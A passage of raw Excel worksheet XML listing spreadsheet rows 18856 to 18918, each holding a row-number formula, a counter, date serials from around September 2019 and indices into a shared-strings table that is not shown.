    </row>
    <row r="18856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18856">
        <f t="shared" si="294"/>
        <v>18855</v>
      </c>
      <c r="B18856">
        <v>3855</v>
      </c>
      <c r="C18856" t="s">
        <v>25497</v>
      </c>
      <c r="D18856" s="1">
        <v>43724</v>
      </c>
      <c r="E18856" t="s">
        <v>30457</v>
      </c>
      <c r="F18856" t="s">
        <v>10021</v>
      </c>
      <c r="G18856" t="s">
        <v>30458</v>
      </c>
    </row>
    <row r="18857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18857">
        <f t="shared" si="294"/>
        <v>18856</v>
      </c>
      <c r="B18857">
        <v>3856</v>
      </c>
      <c r="C18857" t="s">
        <v>25497</v>
      </c>
      <c r="D18857" s="1">
        <v>43719</v>
      </c>
      <c r="F18857" t="s">
        <v>9978</v>
      </c>
      <c r="G18857" t="s">
        <v>30459</v>
      </c>
    </row>
    <row r="18858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18858">
        <f t="shared" si="294"/>
        <v>18857</v>
      </c>
      <c r="B18858">
        <v>3857</v>
      </c>
      <c r="C18858" t="s">
        <v>25497</v>
      </c>
      <c r="D18858" s="1">
        <v>43714</v>
      </c>
      <c r="E18858" t="s">
        <v>25509</v>
      </c>
      <c r="F18858" t="s">
        <v>10021</v>
      </c>
      <c r="G18858" t="s">
        <v>30460</v>
      </c>
    </row>
    <row r="18859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18859">
        <f t="shared" si="294"/>
        <v>18858</v>
      </c>
      <c r="B18859">
        <v>3858</v>
      </c>
      <c r="C18859" t="s">
        <v>25497</v>
      </c>
      <c r="D18859" s="1">
        <v>43719</v>
      </c>
      <c r="E18859" t="s">
        <v>30461</v>
      </c>
      <c r="F18859" t="s">
        <v>9975</v>
      </c>
      <c r="G18859" t="s">
        <v>30462</v>
      </c>
    </row>
    <row r="18860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18860">
        <f t="shared" si="294"/>
        <v>18859</v>
      </c>
      <c r="B18860">
        <v>3859</v>
      </c>
      <c r="C18860" t="s">
        <v>25497</v>
      </c>
      <c r="D18860" s="1">
        <v>43725</v>
      </c>
      <c r="E18860" t="s">
        <v>25517</v>
      </c>
      <c r="F18860" t="s">
        <v>9975</v>
      </c>
      <c r="G18860" t="s">
        <v>30463</v>
      </c>
    </row>
    <row r="18861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18861">
        <f t="shared" si="294"/>
        <v>18860</v>
      </c>
      <c r="B18861">
        <v>3860</v>
      </c>
      <c r="C18861" t="s">
        <v>25497</v>
      </c>
      <c r="D18861" s="1">
        <v>43718</v>
      </c>
      <c r="E18861" t="s">
        <v>30464</v>
      </c>
      <c r="F18861" t="s">
        <v>9975</v>
      </c>
      <c r="G18861" t="s">
        <v>30465</v>
      </c>
    </row>
    <row r="18862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18862">
        <f t="shared" si="294"/>
        <v>18861</v>
      </c>
      <c r="B18862">
        <v>3861</v>
      </c>
      <c r="C18862" t="s">
        <v>25497</v>
      </c>
      <c r="D18862" s="1">
        <v>43729</v>
      </c>
      <c r="E18862" t="s">
        <v>30466</v>
      </c>
      <c r="F18862" t="s">
        <v>9975</v>
      </c>
      <c r="G18862" t="s">
        <v>30467</v>
      </c>
    </row>
    <row r="18863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18863">
        <f t="shared" si="294"/>
        <v>18862</v>
      </c>
      <c r="B18863">
        <v>3862</v>
      </c>
      <c r="C18863" t="s">
        <v>25497</v>
      </c>
      <c r="D18863" s="1">
        <v>43719</v>
      </c>
      <c r="F18863" t="s">
        <v>9975</v>
      </c>
      <c r="G18863" t="s">
        <v>30468</v>
      </c>
    </row>
    <row r="18864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18864">
        <f t="shared" si="294"/>
        <v>18863</v>
      </c>
      <c r="B18864">
        <v>3863</v>
      </c>
      <c r="C18864" t="s">
        <v>25497</v>
      </c>
      <c r="D18864" s="1">
        <v>43727</v>
      </c>
      <c r="F18864" t="s">
        <v>9975</v>
      </c>
      <c r="G18864" t="s">
        <v>30469</v>
      </c>
    </row>
    <row r="18865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18865">
        <f t="shared" si="294"/>
        <v>18864</v>
      </c>
      <c r="B18865">
        <v>3864</v>
      </c>
      <c r="C18865" t="s">
        <v>25497</v>
      </c>
      <c r="D18865" s="1">
        <v>43711</v>
      </c>
      <c r="E18865" t="s">
        <v>25512</v>
      </c>
      <c r="F18865" t="s">
        <v>9975</v>
      </c>
      <c r="G18865" t="s">
        <v>30470</v>
      </c>
    </row>
    <row r="18866" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18866">
        <f t="shared" si="294"/>
        <v>18865</v>
      </c>
      <c r="B18866">
        <v>3865</v>
      </c>
      <c r="C18866" t="s">
        <v>25497</v>
      </c>
      <c r="D18866" s="1">
        <v>43723</v>
      </c>
      <c r="E18866" t="s">
        <v>25881</v>
      </c>
      <c r="F18866" t="s">
        <v>9975</v>
      </c>
      <c r="G18866" t="s">
        <v>30471</v>
      </c>
    </row>
    <row r="18867" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18867">
        <f t="shared" si="294"/>
        <v>18866</v>
      </c>
      <c r="B18867">
        <v>3866</v>
      </c>
      <c r="C18867" t="s">
        <v>25497</v>
      </c>
      <c r="D18867" s="1">
        <v>43721</v>
      </c>
      <c r="E18867" t="s">
        <v>30472</v>
      </c>
      <c r="F18867" t="s">
        <v>9975</v>
      </c>
      <c r="G18867" t="s">
        <v>30473</v>
      </c>
    </row>
    <row r="18868" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18868">
        <f t="shared" si="294"/>
        <v>18867</v>
      </c>
      <c r="B18868">
        <v>3867</v>
      </c>
      <c r="C18868" t="s">
        <v>25497</v>
      </c>
      <c r="D18868" s="1">
        <v>43726</v>
      </c>
      <c r="F18868" t="s">
        <v>9975</v>
      </c>
      <c r="G18868" t="s">
        <v>30474</v>
      </c>
    </row>
    <row r="18869" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18869">
        <f t="shared" si="294"/>
        <v>18868</v>
      </c>
      <c r="B18869">
        <v>3868</v>
      </c>
      <c r="C18869" t="s">
        <v>25497</v>
      </c>
      <c r="D18869" s="1">
        <v>43735</v>
      </c>
      <c r="F18869" t="s">
        <v>9975</v>
      </c>
      <c r="G18869" t="s">
        <v>30475</v>
      </c>
    </row>
    <row r="18870" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18870">
        <f t="shared" si="294"/>
        <v>18869</v>
      </c>
      <c r="B18870">
        <v>3869</v>
      </c>
      <c r="C18870" t="s">
        <v>25497</v>
      </c>
      <c r="D18870" s="1">
        <v>43725</v>
      </c>
      <c r="F18870" t="s">
        <v>9975</v>
      </c>
      <c r="G18870" t="s">
        <v>30476</v>
      </c>
    </row>
    <row r="18871" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18871">
        <f t="shared" si="294"/>
        <v>18870</v>
      </c>
      <c r="B18871">
        <v>3870</v>
      </c>
      <c r="C18871" t="s">
        <v>25497</v>
      </c>
      <c r="D18871" s="1">
        <v>43721</v>
      </c>
      <c r="E18871" t="s">
        <v>30477</v>
      </c>
      <c r="F18871" t="s">
        <v>9975</v>
      </c>
      <c r="G18871" t="s">
        <v>30478</v>
      </c>
    </row>
    <row r="18872" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18872">
        <f t="shared" si="294"/>
        <v>18871</v>
      </c>
      <c r="B18872">
        <v>3871</v>
      </c>
      <c r="C18872" t="s">
        <v>25497</v>
      </c>
      <c r="D18872" s="1">
        <v>43731</v>
      </c>
      <c r="E18872" t="s">
        <v>25543</v>
      </c>
      <c r="F18872" t="s">
        <v>9975</v>
      </c>
      <c r="G18872" t="s">
        <v>30479</v>
      </c>
    </row>
    <row r="18873" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18873">
        <f t="shared" si="294"/>
        <v>18872</v>
      </c>
      <c r="B18873">
        <v>3872</v>
      </c>
      <c r="C18873" t="s">
        <v>25497</v>
      </c>
      <c r="D18873" s="1">
        <v>43712</v>
      </c>
      <c r="E18873" t="s">
        <v>30480</v>
      </c>
      <c r="F18873" t="s">
        <v>10526</v>
      </c>
      <c r="G18873" t="s">
        <v>30481</v>
      </c>
    </row>
    <row r="18874" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18874">
        <f t="shared" si="294"/>
        <v>18873</v>
      </c>
      <c r="B18874">
        <v>3873</v>
      </c>
      <c r="C18874" t="s">
        <v>25497</v>
      </c>
      <c r="D18874" s="1">
        <v>43717</v>
      </c>
      <c r="F18874" t="s">
        <v>9975</v>
      </c>
      <c r="G18874" t="s">
        <v>30482</v>
      </c>
    </row>
    <row r="18875" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18875">
        <f t="shared" si="294"/>
        <v>18874</v>
      </c>
      <c r="B18875">
        <v>3874</v>
      </c>
      <c r="C18875" t="s">
        <v>25497</v>
      </c>
      <c r="D18875" s="1">
        <v>43727</v>
      </c>
      <c r="E18875" t="s">
        <v>30483</v>
      </c>
      <c r="F18875" t="s">
        <v>10526</v>
      </c>
      <c r="G18875" t="s">
        <v>30484</v>
      </c>
    </row>
    <row r="18876" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18876">
        <f t="shared" si="294"/>
        <v>18875</v>
      </c>
      <c r="B18876">
        <v>3875</v>
      </c>
      <c r="C18876" t="s">
        <v>25497</v>
      </c>
      <c r="D18876" s="1">
        <v>43715</v>
      </c>
      <c r="E18876" t="s">
        <v>25512</v>
      </c>
      <c r="F18876" t="s">
        <v>9975</v>
      </c>
      <c r="G18876" t="s">
        <v>30485</v>
      </c>
    </row>
    <row r="18877" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18877">
        <f t="shared" si="294"/>
        <v>18876</v>
      </c>
      <c r="B18877">
        <v>3876</v>
      </c>
      <c r="C18877" t="s">
        <v>25497</v>
      </c>
      <c r="D18877" s="1">
        <v>43728</v>
      </c>
      <c r="E18877" t="s">
        <v>30486</v>
      </c>
      <c r="F18877" t="s">
        <v>9975</v>
      </c>
      <c r="G18877" t="s">
        <v>30487</v>
      </c>
    </row>
    <row r="18878" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18878">
        <f t="shared" si="294"/>
        <v>18877</v>
      </c>
      <c r="B18878">
        <v>3877</v>
      </c>
      <c r="C18878" t="s">
        <v>25497</v>
      </c>
      <c r="D18878" s="1">
        <v>43723</v>
      </c>
      <c r="F18878" t="s">
        <v>9975</v>
      </c>
      <c r="G18878" t="s">
        <v>30488</v>
      </c>
    </row>
    <row r="18879" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18879">
        <f t="shared" si="294"/>
        <v>18878</v>
      </c>
      <c r="B18879">
        <v>3878</v>
      </c>
      <c r="C18879" t="s">
        <v>25497</v>
      </c>
      <c r="D18879" s="1">
        <v>43732</v>
      </c>
      <c r="E18879" t="s">
        <v>30489</v>
      </c>
      <c r="F18879" t="s">
        <v>9975</v>
      </c>
      <c r="G18879" t="s">
        <v>30490</v>
      </c>
    </row>
    <row r="18880" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18880">
        <f t="shared" si="294"/>
        <v>18879</v>
      </c>
      <c r="B18880">
        <v>3879</v>
      </c>
      <c r="C18880" t="s">
        <v>25497</v>
      </c>
      <c r="D18880" s="1">
        <v>43738</v>
      </c>
      <c r="E18880" t="s">
        <v>26983</v>
      </c>
      <c r="F18880" t="s">
        <v>9978</v>
      </c>
      <c r="G18880" t="s">
        <v>30491</v>
      </c>
    </row>
    <row r="18881" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18881">
        <f t="shared" si="294"/>
        <v>18880</v>
      </c>
      <c r="B18881">
        <v>3880</v>
      </c>
      <c r="C18881" t="s">
        <v>25497</v>
      </c>
      <c r="D18881" s="1">
        <v>43734</v>
      </c>
      <c r="F18881" t="s">
        <v>9975</v>
      </c>
      <c r="G18881" t="s">
        <v>30492</v>
      </c>
    </row>
    <row r="18882" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18882">
        <f t="shared" si="294"/>
        <v>18881</v>
      </c>
      <c r="B18882">
        <v>3881</v>
      </c>
      <c r="C18882" t="s">
        <v>25497</v>
      </c>
      <c r="D18882" s="1">
        <v>43726</v>
      </c>
      <c r="E18882" t="s">
        <v>25609</v>
      </c>
      <c r="F18882" t="s">
        <v>9975</v>
      </c>
      <c r="G18882" t="s">
        <v>30493</v>
      </c>
    </row>
    <row r="18883" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18883">
        <f t="shared" ref="A18883:A18946" si="295">+ROW(A18882)</f>
        <v>18882</v>
      </c>
      <c r="B18883">
        <v>3882</v>
      </c>
      <c r="C18883" t="s">
        <v>25497</v>
      </c>
      <c r="D18883" s="1">
        <v>43712</v>
      </c>
      <c r="E18883" t="s">
        <v>25517</v>
      </c>
      <c r="F18883" t="s">
        <v>9975</v>
      </c>
      <c r="G18883" t="s">
        <v>30494</v>
      </c>
    </row>
    <row r="18884" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18884">
        <f t="shared" si="295"/>
        <v>18883</v>
      </c>
      <c r="B18884">
        <v>3883</v>
      </c>
      <c r="C18884" t="s">
        <v>25497</v>
      </c>
      <c r="D18884" s="1">
        <v>43720</v>
      </c>
      <c r="E18884" t="s">
        <v>25512</v>
      </c>
      <c r="F18884" t="s">
        <v>9975</v>
      </c>
      <c r="G18884" t="s">
        <v>30495</v>
      </c>
    </row>
    <row r="18885" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18885">
        <f t="shared" si="295"/>
        <v>18884</v>
      </c>
      <c r="B18885">
        <v>3884</v>
      </c>
      <c r="C18885" t="s">
        <v>25497</v>
      </c>
      <c r="D18885" s="1">
        <v>43711</v>
      </c>
      <c r="E18885" t="s">
        <v>25517</v>
      </c>
      <c r="F18885" t="s">
        <v>9975</v>
      </c>
      <c r="G18885" t="s">
        <v>30496</v>
      </c>
    </row>
    <row r="18886" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18886">
        <f t="shared" si="295"/>
        <v>18885</v>
      </c>
      <c r="B18886">
        <v>3885</v>
      </c>
      <c r="C18886" t="s">
        <v>25497</v>
      </c>
      <c r="D18886" s="1">
        <v>43734</v>
      </c>
      <c r="F18886" t="s">
        <v>9975</v>
      </c>
      <c r="G18886" t="s">
        <v>30497</v>
      </c>
    </row>
    <row r="18887" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18887">
        <f t="shared" si="295"/>
        <v>18886</v>
      </c>
      <c r="B18887">
        <v>3886</v>
      </c>
      <c r="C18887" t="s">
        <v>25497</v>
      </c>
      <c r="D18887" s="1">
        <v>43721</v>
      </c>
      <c r="F18887" t="s">
        <v>9975</v>
      </c>
      <c r="G18887" t="s">
        <v>30498</v>
      </c>
    </row>
    <row r="18888" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18888">
        <f t="shared" si="295"/>
        <v>18887</v>
      </c>
      <c r="B18888">
        <v>3887</v>
      </c>
      <c r="C18888" t="s">
        <v>25497</v>
      </c>
      <c r="D18888" s="1">
        <v>43719</v>
      </c>
      <c r="E18888" t="s">
        <v>19705</v>
      </c>
      <c r="F18888" t="s">
        <v>9975</v>
      </c>
      <c r="G18888" t="s">
        <v>30499</v>
      </c>
    </row>
    <row r="18889" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18889">
        <f t="shared" si="295"/>
        <v>18888</v>
      </c>
      <c r="B18889">
        <v>3888</v>
      </c>
      <c r="C18889" t="s">
        <v>25497</v>
      </c>
      <c r="D18889" s="1">
        <v>43725</v>
      </c>
      <c r="F18889" t="s">
        <v>9975</v>
      </c>
      <c r="G18889" t="s">
        <v>30500</v>
      </c>
    </row>
    <row r="18890" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18890">
        <f t="shared" si="295"/>
        <v>18889</v>
      </c>
      <c r="B18890">
        <v>3889</v>
      </c>
      <c r="C18890" t="s">
        <v>25497</v>
      </c>
      <c r="D18890" s="1">
        <v>43718</v>
      </c>
      <c r="E18890" t="s">
        <v>25592</v>
      </c>
      <c r="F18890" t="s">
        <v>9975</v>
      </c>
      <c r="G18890" t="s">
        <v>30501</v>
      </c>
    </row>
    <row r="18891" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18891">
        <f t="shared" si="295"/>
        <v>18890</v>
      </c>
      <c r="B18891">
        <v>3890</v>
      </c>
      <c r="C18891" t="s">
        <v>25497</v>
      </c>
      <c r="D18891" s="1">
        <v>43730</v>
      </c>
      <c r="E18891" t="s">
        <v>30502</v>
      </c>
      <c r="F18891" t="s">
        <v>9975</v>
      </c>
      <c r="G18891" t="s">
        <v>30503</v>
      </c>
    </row>
    <row r="18892" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18892">
        <f t="shared" si="295"/>
        <v>18891</v>
      </c>
      <c r="B18892">
        <v>3891</v>
      </c>
      <c r="C18892" t="s">
        <v>25497</v>
      </c>
      <c r="D18892" s="1">
        <v>43725</v>
      </c>
      <c r="E18892" t="s">
        <v>25942</v>
      </c>
      <c r="F18892" t="s">
        <v>9975</v>
      </c>
      <c r="G18892" t="s">
        <v>30504</v>
      </c>
    </row>
    <row r="18893" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18893">
        <f t="shared" si="295"/>
        <v>18892</v>
      </c>
      <c r="B18893">
        <v>3892</v>
      </c>
      <c r="C18893" t="s">
        <v>25497</v>
      </c>
      <c r="D18893" s="1">
        <v>43732</v>
      </c>
      <c r="E18893" t="s">
        <v>26178</v>
      </c>
      <c r="F18893" t="s">
        <v>9975</v>
      </c>
      <c r="G18893" t="s">
        <v>30505</v>
      </c>
    </row>
    <row r="18894" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18894">
        <f t="shared" si="295"/>
        <v>18893</v>
      </c>
      <c r="B18894">
        <v>3893</v>
      </c>
      <c r="C18894" t="s">
        <v>25497</v>
      </c>
      <c r="D18894" s="1">
        <v>43731</v>
      </c>
      <c r="E18894" t="s">
        <v>25895</v>
      </c>
      <c r="F18894" t="s">
        <v>9975</v>
      </c>
      <c r="G18894" t="s">
        <v>30506</v>
      </c>
    </row>
    <row r="18895" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18895">
        <f t="shared" si="295"/>
        <v>18894</v>
      </c>
      <c r="B18895">
        <v>3894</v>
      </c>
      <c r="C18895" t="s">
        <v>25497</v>
      </c>
      <c r="D18895" s="1">
        <v>43732</v>
      </c>
      <c r="F18895" t="s">
        <v>9975</v>
      </c>
      <c r="G18895" t="s">
        <v>30507</v>
      </c>
    </row>
    <row r="18896" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18896">
        <f t="shared" si="295"/>
        <v>18895</v>
      </c>
      <c r="B18896">
        <v>3895</v>
      </c>
      <c r="C18896" t="s">
        <v>25497</v>
      </c>
      <c r="D18896" s="1">
        <v>43712</v>
      </c>
      <c r="E18896" t="s">
        <v>30508</v>
      </c>
      <c r="F18896" t="s">
        <v>9975</v>
      </c>
      <c r="G18896" t="s">
        <v>30509</v>
      </c>
    </row>
    <row r="18897" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18897">
        <f t="shared" si="295"/>
        <v>18896</v>
      </c>
      <c r="B18897">
        <v>3896</v>
      </c>
      <c r="C18897" t="s">
        <v>25497</v>
      </c>
      <c r="D18897" s="1">
        <v>43715</v>
      </c>
      <c r="F18897" t="s">
        <v>9975</v>
      </c>
      <c r="G18897" t="s">
        <v>30510</v>
      </c>
    </row>
    <row r="18898" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18898">
        <f t="shared" si="295"/>
        <v>18897</v>
      </c>
      <c r="B18898">
        <v>3897</v>
      </c>
      <c r="C18898" t="s">
        <v>25497</v>
      </c>
      <c r="D18898" s="1">
        <v>43714</v>
      </c>
      <c r="E18898" t="s">
        <v>30511</v>
      </c>
      <c r="F18898" t="s">
        <v>9975</v>
      </c>
      <c r="G18898" t="s">
        <v>30512</v>
      </c>
    </row>
    <row r="18899" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18899">
        <f t="shared" si="295"/>
        <v>18898</v>
      </c>
      <c r="B18899">
        <v>3898</v>
      </c>
      <c r="C18899" t="s">
        <v>25497</v>
      </c>
      <c r="D18899" s="1">
        <v>43716</v>
      </c>
      <c r="E18899" t="s">
        <v>30513</v>
      </c>
      <c r="F18899" t="s">
        <v>9975</v>
      </c>
      <c r="G18899" t="s">
        <v>30514</v>
      </c>
    </row>
    <row r="18900" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18900">
        <f t="shared" si="295"/>
        <v>18899</v>
      </c>
      <c r="B18900">
        <v>3899</v>
      </c>
      <c r="C18900" t="s">
        <v>25497</v>
      </c>
      <c r="D18900" s="1">
        <v>43717</v>
      </c>
      <c r="F18900" t="s">
        <v>9978</v>
      </c>
      <c r="G18900" t="s">
        <v>30515</v>
      </c>
    </row>
    <row r="18901" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18901">
        <f t="shared" si="295"/>
        <v>18900</v>
      </c>
      <c r="B18901">
        <v>3900</v>
      </c>
      <c r="C18901" t="s">
        <v>25497</v>
      </c>
      <c r="D18901" s="1">
        <v>43712</v>
      </c>
      <c r="E18901" t="s">
        <v>25592</v>
      </c>
      <c r="F18901" t="s">
        <v>9975</v>
      </c>
      <c r="G18901" t="s">
        <v>30516</v>
      </c>
    </row>
    <row r="18902" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18902">
        <f t="shared" si="295"/>
        <v>18901</v>
      </c>
      <c r="B18902">
        <v>3901</v>
      </c>
      <c r="C18902" t="s">
        <v>25497</v>
      </c>
      <c r="D18902" s="1">
        <v>43734</v>
      </c>
      <c r="E18902" t="s">
        <v>25592</v>
      </c>
      <c r="F18902" t="s">
        <v>9975</v>
      </c>
      <c r="G18902" t="s">
        <v>30517</v>
      </c>
    </row>
    <row r="18903" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18903">
        <f t="shared" si="295"/>
        <v>18902</v>
      </c>
      <c r="B18903">
        <v>3902</v>
      </c>
      <c r="C18903" t="s">
        <v>25497</v>
      </c>
      <c r="D18903" s="1">
        <v>43720</v>
      </c>
      <c r="E18903" t="s">
        <v>30518</v>
      </c>
      <c r="F18903" t="s">
        <v>10526</v>
      </c>
      <c r="G18903" t="s">
        <v>30519</v>
      </c>
    </row>
    <row r="18904" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18904">
        <f t="shared" si="295"/>
        <v>18903</v>
      </c>
      <c r="B18904">
        <v>3903</v>
      </c>
      <c r="C18904" t="s">
        <v>25497</v>
      </c>
      <c r="D18904" s="1">
        <v>43735</v>
      </c>
      <c r="E18904" t="s">
        <v>30520</v>
      </c>
      <c r="F18904" t="s">
        <v>9975</v>
      </c>
      <c r="G18904" t="s">
        <v>30521</v>
      </c>
    </row>
    <row r="18905" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18905">
        <f t="shared" si="295"/>
        <v>18904</v>
      </c>
      <c r="B18905">
        <v>3904</v>
      </c>
      <c r="C18905" t="s">
        <v>25497</v>
      </c>
      <c r="D18905" s="1">
        <v>43734</v>
      </c>
      <c r="F18905" t="s">
        <v>9975</v>
      </c>
      <c r="G18905" t="s">
        <v>30522</v>
      </c>
    </row>
    <row r="18906" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18906">
        <f t="shared" si="295"/>
        <v>18905</v>
      </c>
      <c r="B18906">
        <v>3905</v>
      </c>
      <c r="C18906" t="s">
        <v>25497</v>
      </c>
      <c r="D18906" s="1">
        <v>43717</v>
      </c>
      <c r="E18906" t="s">
        <v>25538</v>
      </c>
      <c r="F18906" t="s">
        <v>9975</v>
      </c>
      <c r="G18906" t="s">
        <v>30523</v>
      </c>
    </row>
    <row r="18907" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18907">
        <f t="shared" si="295"/>
        <v>18906</v>
      </c>
      <c r="B18907">
        <v>3906</v>
      </c>
      <c r="C18907" t="s">
        <v>25497</v>
      </c>
      <c r="D18907" s="1">
        <v>43724</v>
      </c>
      <c r="E18907" t="s">
        <v>30524</v>
      </c>
      <c r="F18907" t="s">
        <v>9975</v>
      </c>
      <c r="G18907" t="s">
        <v>30525</v>
      </c>
    </row>
    <row r="18908" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18908">
        <f t="shared" si="295"/>
        <v>18907</v>
      </c>
      <c r="B18908">
        <v>3907</v>
      </c>
      <c r="C18908" t="s">
        <v>25497</v>
      </c>
      <c r="D18908" s="1">
        <v>43737</v>
      </c>
      <c r="F18908" t="s">
        <v>9975</v>
      </c>
      <c r="G18908" t="s">
        <v>30526</v>
      </c>
    </row>
    <row r="18909" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18909">
        <f t="shared" si="295"/>
        <v>18908</v>
      </c>
      <c r="B18909">
        <v>3908</v>
      </c>
      <c r="C18909" t="s">
        <v>25497</v>
      </c>
      <c r="D18909" s="1">
        <v>43725</v>
      </c>
      <c r="F18909" t="s">
        <v>10526</v>
      </c>
      <c r="G18909" t="s">
        <v>30527</v>
      </c>
    </row>
    <row r="18910" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18910">
        <f t="shared" si="295"/>
        <v>18909</v>
      </c>
      <c r="B18910">
        <v>3909</v>
      </c>
      <c r="C18910" t="s">
        <v>25497</v>
      </c>
      <c r="D18910" s="1">
        <v>43718</v>
      </c>
      <c r="E18910" t="s">
        <v>25642</v>
      </c>
      <c r="F18910" t="s">
        <v>9975</v>
      </c>
      <c r="G18910" t="s">
        <v>30528</v>
      </c>
    </row>
    <row r="18911" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18911">
        <f t="shared" si="295"/>
        <v>18910</v>
      </c>
      <c r="B18911">
        <v>3910</v>
      </c>
      <c r="C18911" t="s">
        <v>25497</v>
      </c>
      <c r="D18911" s="1">
        <v>43711</v>
      </c>
      <c r="F18911" t="s">
        <v>9975</v>
      </c>
      <c r="G18911" t="s">
        <v>30529</v>
      </c>
    </row>
    <row r="18912" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18912">
        <f t="shared" si="295"/>
        <v>18911</v>
      </c>
      <c r="B18912">
        <v>3911</v>
      </c>
      <c r="C18912" t="s">
        <v>25497</v>
      </c>
      <c r="D18912" s="1">
        <v>43733</v>
      </c>
      <c r="E18912" t="s">
        <v>30530</v>
      </c>
      <c r="F18912" t="s">
        <v>9975</v>
      </c>
      <c r="G18912" t="s">
        <v>30531</v>
      </c>
    </row>
    <row r="18913" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18913">
        <f t="shared" si="295"/>
        <v>18912</v>
      </c>
      <c r="B18913">
        <v>3912</v>
      </c>
      <c r="C18913" t="s">
        <v>25497</v>
      </c>
      <c r="D18913" s="1">
        <v>43721</v>
      </c>
      <c r="E18913" t="s">
        <v>25509</v>
      </c>
      <c r="F18913" t="s">
        <v>10021</v>
      </c>
      <c r="G18913" t="s">
        <v>30532</v>
      </c>
    </row>
    <row r="18914" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18914">
        <f t="shared" si="295"/>
        <v>18913</v>
      </c>
      <c r="B18914">
        <v>3913</v>
      </c>
      <c r="C18914" t="s">
        <v>25497</v>
      </c>
      <c r="D18914" s="1">
        <v>43718</v>
      </c>
      <c r="F18914" t="s">
        <v>9975</v>
      </c>
      <c r="G18914" t="s">
        <v>30533</v>
      </c>
    </row>
    <row r="18915" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18915">
        <f t="shared" si="295"/>
        <v>18914</v>
      </c>
      <c r="B18915">
        <v>3914</v>
      </c>
      <c r="C18915" t="s">
        <v>25497</v>
      </c>
      <c r="D18915" s="1">
        <v>43713</v>
      </c>
      <c r="E18915" t="s">
        <v>27458</v>
      </c>
      <c r="F18915" t="s">
        <v>9975</v>
      </c>
      <c r="G18915" t="s">
        <v>30534</v>
      </c>
    </row>
    <row r="18916" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18916">
        <f t="shared" si="295"/>
        <v>18915</v>
      </c>
      <c r="B18916">
        <v>3915</v>
      </c>
      <c r="C18916" t="s">
        <v>25497</v>
      </c>
      <c r="D18916" s="1">
        <v>43734</v>
      </c>
      <c r="E18916" t="s">
        <v>25517</v>
      </c>
      <c r="F18916" t="s">
        <v>9975</v>
      </c>
      <c r="G18916" t="s">
        <v>30535</v>
      </c>
    </row>
    <row r="18917" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18917">
        <f t="shared" si="295"/>
        <v>18916</v>
      </c>
      <c r="B18917">
        <v>3916</v>
      </c>
      <c r="C18917" t="s">
        <v>25497</v>
      </c>
      <c r="D18917" s="1">
        <v>43734</v>
      </c>
      <c r="E18917" t="s">
        <v>25512</v>
      </c>
      <c r="F18917" t="s">
        <v>9975</v>
      </c>
      <c r="G18917" t="s">
        <v>30536</v>
      </c>
    </row>
    <row r="18918" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18918">
        <f t="shared" si="295"/>
        <v>18917</v>
      </c>
      <c r="B18918">
        <v>3917</v>
      </c>
      <c r="C18918" t="s">
        <v>25497</v>
      </c>
      <c r="D18918" s="1">
        <v>43709</v>
      </c>
      <c r="E18918" t="s">
        <v>30537</v>
      </c>
      <c r="F18918" t="s">
        <v>9978</v>
      </c>
      <c r="G18918" t="s">
        <v>30538</v>
      </c>
    </row>
    <row r="18919" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18919">
        <f t="shared" si="295"/>
